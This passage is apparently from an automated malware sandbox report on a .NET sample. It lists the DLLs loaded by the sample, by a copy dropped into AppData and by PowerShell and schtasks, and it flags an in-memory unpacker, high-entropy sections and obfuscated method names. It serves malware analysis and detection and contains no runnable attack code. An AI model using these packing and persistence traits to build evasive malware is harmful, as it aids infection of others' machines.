                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeSection loaded: urlmon.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeSection loaded: iertutil.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeSection loaded: srvcli.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeSection loaded: netutils.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeSection loaded: propsys.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeSection loaded: windowscodecs.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeSection loaded: ntmarta.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeSection loaded: edputil.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeSection loaded: windows.staterepositoryps.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeSection loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeSection loaded: appresolver.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeSection loaded: bcp47langs.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeSection loaded: slc.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeSection loaded: sppc.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeSection loaded: onecorecommonproxystub.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeSection loaded: onecoreuapcommonproxystub.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeSection loaded: rasapi32.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeSection loaded: rasman.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeSection loaded: rtutils.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeSection loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeSection loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeSection loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeSection loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeSection loaded: rasadhlp.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeSection loaded: fwpuclnt.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeSection loaded: secur32.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeSection loaded: schannel.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeSection loaded: mskeyprotect.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeSection loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeSection loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeSection loaded: ncryptsslp.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeSection loaded: wbemcomn.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeSection loaded: ntmarta.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeSection loaded: windowscodecs.dll
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: RgIbrhxoEx.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: RgIbrhxoEx.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                    Data Obfuscation

                    barindex
                    .NET source code contains potential unpacker
                    Source: RgIbrhxoEx.exe, StatGrapher.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                    Source: LjGABleGAy.exe.0.dr, StatGrapher.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.RgIbrhxoEx.exe.5270000.5.raw.unpack, bg.cs.Net Code: System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.RgIbrhxoEx.exe.5f40000.8.raw.unpack, A8wQQPxStWJpqrtu18.cs.Net Code: mFUTmlPCn6 System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.RgIbrhxoEx.exe.40399e8.4.raw.unpack, A8wQQPxStWJpqrtu18.cs.Net Code: mFUTmlPCn6 System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.RgIbrhxoEx.exe.3fe01c8.2.raw.unpack, A8wQQPxStWJpqrtu18.cs.Net Code: mFUTmlPCn6 System.Reflection.Assembly.Load(byte[])
                    Source: RgIbrhxoEx.exeStatic PE information: section name: .text entropy: 7.9275615283647385
                    Source: LjGABleGAy.exe.0.drStatic PE information: section name: .text entropy: 7.9275615283647385
                    Source: 0.2.RgIbrhxoEx.exe.5f40000.8.raw.unpack, RdaVC8vAVRBSh8dNl4.csHigh entropy of concatenated method names: 'GE9pCZ3tRK', 'thVps9ROyc', 'XLupaO1JWy', 'FZWpvD7KCE', 'BIipAGJX9Z', 'KWdp4HoDJX', 'A8BpSVswg3', 'NmjpiVA4AG', 'SJjpr4tvKW', 'vN3pBL6Ma2'
                    Source: 0.2.RgIbrhxoEx.exe.5f40000.8.raw.unpack, FYePTKPppX1pL8MWjG.csHigh entropy of concatenated method names: 'rWQA9up4cr', 'LVRAX6Jg1U', 'L7XAPwv0HU', 'XWQA69mPa3', 't6cAwCh6uG', 'd7lAQdTwcV', 'Fs5AG9aMlw', 'XlnAnCsmYw', 'ehCARJkrw3', 'wyxADRnJb9'
                    Source: 0.2.RgIbrhxoEx.exe.5f40000.8.raw.unpack, tluVmiTalSJc5mJhQH.csHigh entropy of concatenated method names: 'DdZMqjapGc', 'saYMxOORK0', 'eAVMgRBSh8', 'SNlMc4iwCe', 'FBiMA4cKP4', 'BRbM4MU9Rk', 'eM5GP4V1Zb9XLv3fk3', 'LeArr5yYMCtgPgfnvq', 'wGnMMj5Cuo', 'GxcMtHd0Qw'
                    Source: 0.2.RgIbrhxoEx.exe.5f40000.8.raw.unpack, UjapGcaBaYOORK0HUJ.csHigh entropy of concatenated method names: 'fUnIPfN6KE', 'OANI6yyO0R', 'YyhIdLpkRG', 'XbIIHRwHQx', 'SYwIO5it7h', 'JxLIZDgoo1', 'm6SIbqNa1M', 'yN6IyuOR1X', 'BsvIjURsKx', 'xYJI5SVfUQ'
                    Source: 0.2.RgIbrhxoEx.exe.5f40000.8.raw.unpack, v3grVy54o4iBnIfO0H.csHigh entropy of concatenated method names: 'VQfrM1ZIkn', 'M9Art6V3wp', 'lG3rTnisVp', 'mTgrkxX4YY', 'sX5rIww28C', 'Pj0r0lGLy2', 'YoVroKgYA0', 'axoib4csW5', 'fORiy04hjC', 'YkPijmllee'
                    Source: 0.2.RgIbrhxoEx.exe.5f40000.8.raw.unpack, rwCepLlUfgLqGlBi4c.csHigh entropy of concatenated method names: 'fyV01Zgm3Y', 'pxr0L2YODB', 'nmjpQ6Uiqi', 'q0spGIga7J', 'MAVpnG5wSy', 'wfJpRWn7pu', 'HBspDAvkRZ', 'aL0putu1Dm', 'BdapVvaTBe', 'Nqqp9kvejt'
                    Source: 0.2.RgIbrhxoEx.exe.5f40000.8.raw.unpack, oTb2dLEqtrBQAnuZf0.csHigh entropy of concatenated method names: 'Qn7WakdZLU', 'mfyWvqdDnB', 'BbuW2RFxoe', 'FeYWwdxpTb', 'F0YWGT2n61', 'lghWn7XUvR', 'Q6nWDTjMn9', 'sPuWudnvhG', 't7xW95NIE8', 'cmMWNP8x5f'
                    Source: 0.2.RgIbrhxoEx.exe.5f40000.8.raw.unpack, miXaaIZp9TTYEDwgGH.csHigh entropy of concatenated method names: 'vqsSyaci7G', 'W6SS55GCg5', 'ubZiKHWEAA', 'ECRiMkdT2U', 'jS9SN4rgln', 'HPySX13SSB', 'FqLSElSvpu', 'ncvSPYfxmx', 'swXS6Mus2t', 'bE2SdwhRLQ'
                    Source: 0.2.RgIbrhxoEx.exe.5f40000.8.raw.unpack, cUrp35yXQ3c5piSn2O.csHigh entropy of concatenated method names: 'vcvikcA4xm', 'WPNiIJrHDL', 'Oe6ipbJnV0', 'b2ti0ndErL', 'kVhioIExc3', 'c0NiqNmc1l', 'CNPixDwBYD', 'oDOie4Lcr9', 'KOdigWsMPP', 'wbWic3bRke'
                    Source: 0.2.RgIbrhxoEx.exe.5f40000.8.raw.unpack, A8wQQPxStWJpqrtu18.csHigh entropy of concatenated method names: 'rckt8ETmD1', 'b23tkvnnO9', 'UtMtI5poFs', 'xDXtptB6BW', 'qvut06vYMO', 'QTMto0cXRp', 'E3VtqWNCku', 'lfFtx7thyx', 'JBFteBlSSW', 'xGYtgoLZ5m'
                    Source: 0.2.RgIbrhxoEx.exe.5f40000.8.raw.unpack, d5xGCIYeXrCGF0aQYG.csHigh entropy of concatenated method names: 'sOdmyEy3M', 'tPoCB4cGo', 'iGmswyXPR', 'xemLrw0bd', 'W7WvXMhFP', 'MtFlKlvcO', 'rtwlEg0CrIUNCi3Pg0', 'o4x3xsjM4vlTxBwGDk', 'HjQGSnCvcbtHkH1unr', 'rSfiBLOYw'
                    Source: 0.2.RgIbrhxoEx.exe.5f40000.8.raw.unpack, vI0bFBItbBVmhEGKUA.csHigh entropy of concatenated method names: 'Dispose', 'IpfMjpIkxZ', 'GBiYwWLOlE', 'sC0ggCZRqc', 'htUM5rp35X', 'I3cMz5piSn', 'ProcessDialogKey', 'FOhYKXJkGH', 'FbtYMYbCtf', 'B6PYYF3grV'
                    Source: 0.2.RgIbrhxoEx.exe.5f40000.8.raw.unpack, teGgZqMKAB1ymEk7wmJ.csHigh entropy of concatenated method names: 'LGJrfcoH0a', 'uLWrhP4b7W', 'yvLrmMjBQT', 'zyMrCyDj13', 'LV2r1QCFw5', 'AmkrsOR1hn', 'GdfrLEFMuP', 'xg9rara6pU', 'a2yrvo1HpB', 'stsrlAOLZ7'
                    Source: 0.2.RgIbrhxoEx.exe.5f40000.8.raw.unpack, pCP4HxzZW8CO7UhW4b.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'avHrWFlh0d', 'yGnrA1SmfG', 'Idvr4yg2Lm', 'lawrSDOh11', 'jb8riH3P8J', 'csirrVabpB', 'kOHrBkAl1U'
                    Source: 0.2.RgIbrhxoEx.exe.5f40000.8.raw.unpack, a82EhBMtPHAWTw6PSNj.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'igwBPIQfJV', 'eWIB6ZFb3J', 'fJ1Bdd6ono', 'lrfBHjLgb5', 'mDJBOseQLE', 'MRGBZLgwXe', 'vKBBblkd0c'
                    Source: 0.2.RgIbrhxoEx.exe.5f40000.8.raw.unpack, aP41Rb2MU9RkwkW9m8.csHigh entropy of concatenated method names: 'AOVo8m7tyv', 'ftyoIvqwfY', 'zOCo0uEWf1', 'pDcoqIo4Gn', 'zK3oxVfGSH', 'J8f0OpkmhJ', 'zXX0ZuYHmV', 'nni0blgEwu', 'Jvo0yiG5To', 'wTC0jM2vom'
                    Source: 0.2.RgIbrhxoEx.exe.5f40000.8.raw.unpack, zXJkGHjlbtYbCtf16P.csHigh entropy of concatenated method names: 'GMUi2l0yjI', 'KXgiwpIypI', 'wjTiQhFeZ7', 'GkYiGn0vOL', 'nZ9iP7Zvt2', 'g7Einf9REf', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.RgIbrhxoEx.exe.5f40000.8.raw.unpack, JdhmicVP8EU7GciB18.csHigh entropy of concatenated method names: 'l26qf89fwX', 'VudqhaVUg9', 'KAbqmSuyGm', 'hpIqCGfENk', 'UFFq1TlwvE', 'cbMqsbEXP5', 'mPZqLw65nT', 'y2Aqa3mQ1G', 'TJ6qvFmjc5', 'mbYql8QwMe'
                    Source: 0.2.RgIbrhxoEx.exe.40399e8.4.raw.unpack, RdaVC8vAVRBSh8dNl4.csHigh entropy of concatenated method names: 'GE9pCZ3tRK', 'thVps9ROyc', 'XLupaO1JWy', 'FZWpvD7KCE', 'BIipAGJX9Z', 'KWdp4HoDJX', 'A8BpSVswg3', 'NmjpiVA4AG', 'SJjpr4tvKW', 'vN3pBL6Ma2'
                    Source: 0.2.RgIbrhxoEx.exe.40399e8.4.raw.unpack, FYePTKPppX1pL8MWjG.csHigh entropy of concatenated method names: 'rWQA9up4cr', 'LVRAX6Jg1U', 'L7XAPwv0HU', 'XWQA69mPa3', 't6cAwCh6uG', 'd7lAQdTwcV', 'Fs5AG9aMlw', 'XlnAnCsmYw', 'ehCARJkrw3', 'wyxADRnJb9'
                    Source: 0.2.RgIbrhxoEx.exe.40399e8.4.raw.unpack, tluVmiTalSJc5mJhQH.csHigh entropy of concatenated method names: 'DdZMqjapGc', 'saYMxOORK0', 'eAVMgRBSh8', 'SNlMc4iwCe', 'FBiMA4cKP4', 'BRbM4MU9Rk', 'eM5GP4V1Zb9XLv3fk3', 'LeArr5yYMCtgPgfnvq', 'wGnMMj5Cuo', 'GxcMtHd0Qw'
                    Source: 0.2.RgIbrhxoEx.exe.40399e8.4.raw.unpack, UjapGcaBaYOORK0HUJ.csHigh entropy of concatenated method names: 'fUnIPfN6KE', 'OANI6yyO0R', 'YyhIdLpkRG', 'XbIIHRwHQx', 'SYwIO5it7h', 'JxLIZDgoo1', 'm6SIbqNa1M', 'yN6IyuOR1X', 'BsvIjURsKx', 'xYJI5SVfUQ'
                    Source: 0.2.RgIbrhxoEx.exe.40399e8.4.raw.unpack, v3grVy54o4iBnIfO0H.csHigh entropy of concatenated method names: 'VQfrM1ZIkn', 'M9Art6V3wp', 'lG3rTnisVp', 'mTgrkxX4YY', 'sX5rIww28C', 'Pj0r0lGLy2', 'YoVroKgYA0', 'axoib4csW5', 'fORiy04hjC', 'YkPijmllee'
                    Source: 0.2.RgIbrhxoEx.exe.40399e8.4.raw.unpack, rwCepLlUfgLqGlBi4c.csHigh entropy of concatenated method names: 'fyV01Zgm3Y', 'pxr0L2YODB', 'nmjpQ6Uiqi', 'q0spGIga7J', 'MAVpnG5wSy', 'wfJpRWn7pu', 'HBspDAvkRZ', 'aL0putu1Dm', 'BdapVvaTBe', 'Nqqp9kvejt'
                    Source: 0.2.RgIbrhxoEx.exe.40399e8.4.raw.unpack, oTb2dLEqtrBQAnuZf0.csHigh entropy of concatenated method names: 'Qn7WakdZLU', 'mfyWvqdDnB', 'BbuW2RFxoe', 'FeYWwdxpTb', 'F0YWGT2n61', 'lghWn7XUvR', 'Q6nWDTjMn9', 'sPuWudnvhG', 't7xW95NIE8', 'cmMWNP8x5f'
                    Source: 0.2.RgIbrhxoEx.exe.40399e8.4.raw.unpack, miXaaIZp9TTYEDwgGH.csHigh entropy of concatenated method names: 'vqsSyaci7G', 'W6SS55GCg5', 'ubZiKHWEAA', 'ECRiMkdT2U', 'jS9SN4rgln', 'HPySX13SSB', 'FqLSElSvpu', 'ncvSPYfxmx', 'swXS6Mus2t', 'bE2SdwhRLQ'
                    Source: 0.2.RgIbrhxoEx.exe.40399e8.4.raw.unpack, cUrp35yXQ3c5piSn2O.csHigh entropy of concatenated method names: 'vcvikcA4xm', 'WPNiIJrHDL', 'Oe6ipbJnV0', 'b2ti0ndErL', 'kVhioIExc3', 'c0NiqNmc1l', 'CNPixDwBYD', 'oDOie4Lcr9', 'KOdigWsMPP', 'wbWic3bRke'
                    Source: 0.2.RgIbrhxoEx.exe.40399e8.4.raw.unpack, A8wQQPxStWJpqrtu18.csHigh entropy of concatenated method names: 'rckt8ETmD1', 'b23tkvnnO9', 'UtMtI5poFs', 'xDXtptB6BW', 'qvut06vYMO', 'QTMto0cXRp', 'E3VtqWNCku', 'lfFtx7thyx', 'JBFteBlSSW', 'xGYtgoLZ5m'
                    Source: 0.2.RgIbrhxoEx.exe.40399e8.4.raw.unpack, d5xGCIYeXrCGF0aQYG.csHigh entropy of concatenated method names: 'sOdmyEy3M', 'tPoCB4cGo', 'iGmswyXPR', 'xemLrw0bd', 'W7WvXMhFP', 'MtFlKlvcO', 'rtwlEg0CrIUNCi3Pg0', 'o4x3xsjM4vlTxBwGDk', 'HjQGSnCvcbtHkH1unr', 'rSfiBLOYw'
                    Source: 0.2.RgIbrhxoEx.exe.40399e8.4.raw.unpack, vI0bFBItbBVmhEGKUA.csHigh entropy of concatenated method names: 'Dispose', 'IpfMjpIkxZ', 'GBiYwWLOlE', 'sC0ggCZRqc', 'htUM5rp35X', 'I3cMz5piSn', 'ProcessDialogKey', 'FOhYKXJkGH', 'FbtYMYbCtf', 'B6PYYF3grV'
                    Source: 0.2.RgIbrhxoEx.exe.40399e8.4.raw.unpack, teGgZqMKAB1ymEk7wmJ.csHigh entropy of concatenated method names: 'LGJrfcoH0a', 'uLWrhP4b7W', 'yvLrmMjBQT', 'zyMrCyDj13', 'LV2r1QCFw5', 'AmkrsOR1hn', 'GdfrLEFMuP', 'xg9rara6pU', 'a2yrvo1HpB', 'stsrlAOLZ7'
